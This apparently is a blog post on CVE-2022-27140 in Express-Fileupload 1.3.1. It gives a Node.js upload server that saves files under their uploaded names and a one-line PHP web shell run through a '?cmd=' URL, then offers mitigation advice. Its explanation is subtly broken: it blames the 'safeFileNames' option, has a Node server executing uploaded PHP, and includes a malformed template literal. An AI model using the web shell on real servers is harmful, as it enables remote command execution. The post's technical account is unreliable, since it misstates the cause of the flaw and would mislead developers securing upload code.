In this post, we'll be discussing a newly discovered vulnerability in the popular file upload module, Express-Fileupload v1.3.1. The vulnerability, designated as CVE-2022-27140, allows an attacker to exploit an arbitrary file upload feature to execute arbitrary code through a crafted PHP file. We'll go over the vulnerability in detail, provide a code snippet to showcase the exploit, and link to original references.
Background
Express-Fileupload is a widely-used module for handling file uploads in Node.js applications. It provides an easy-to-use middleware that can handle file uploads with a simple implementation. However, the version mentioned, 1.3.1, exhibits an arbitrary file upload vulnerability, which, if exploited, can have severe consequences, including compromising the whole system.
Exploit details
The exploit essentially involves uploading a malicious PHP file to the target server, bypassing any file filtering mechanisms present and potentially leading to remote code execution.
The core of this vulnerability originates from an insecure file upload configuration that fails to sufficiently validate the uploaded files' content and type. With this vulnerability, an attacker can trick the system into accepting and executing a crafted PHP file in an unintended manner.
The following code snippet demonstrates the exploitation of CVE-2022-27140
const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();
app.use(
fileUpload({
safeFileNames: true,
limits: { fileSize: 5 * 1024 * 1024 },
})
);
app.post('/upload', (req, res) => {
// Assuming that the uploaded file is in 'image' field
const file = req.files.image;
// Saving the uploaded file in the current directory
file.mv(./${file.name}, (err) => {
if (err) {
return res.status(500).send('Error while saving file.');
}
res.send('File uploaded.');
});
});
app.listen(300, () => {
console.log('App is listening on port 300');
});
In the code snippet above, the key point to notice is the safeFileNames option set to true. This makes the whole server vulnerable, as it allows an attacker to upload arbitrary content with unrestricted file types. The limits object is also set to accept files up to 5MB in size.
Now, let's say an attacker uploads a file named attack.php with the following content
<?php
system($_GET['cmd']);
?>
Using the exploit, the attacker can then execute any command on the server by visiting a URL like: http://example.com/attack.php?cmd=<command>;.
Mitigation
To mitigate this vulnerability in an Express-Fileupload-based system, the ideal solution is to update the module to its latest version if the vulnerability is fixed in it. Otherwise, you can implement stronger server-side validation for uploaded files by checking their MIME types and making sure that only trusted file types are accepted.
Links to original references
1. NVD - CVE-2022-27140
2. Vulnerability disclosure on GitHub
3. Node.js Security Advisory
Conclusion
CVE-2022-27140 is a serious vulnerability that exposes systems using Express-Fileupload v1.3.1 to arbitrary file uploads, potentially leading to remote code execution. If you are using this module, it's important to take appropriate measures to protect your system against this vulnerability by updating to a more secure version and applying robust server-side validation to prevent unintended file uploads.
Timeline
Published on: 04/12/2022 17:15:00 UTC
Last modified on: 04/19/2022 18:00:00 UTC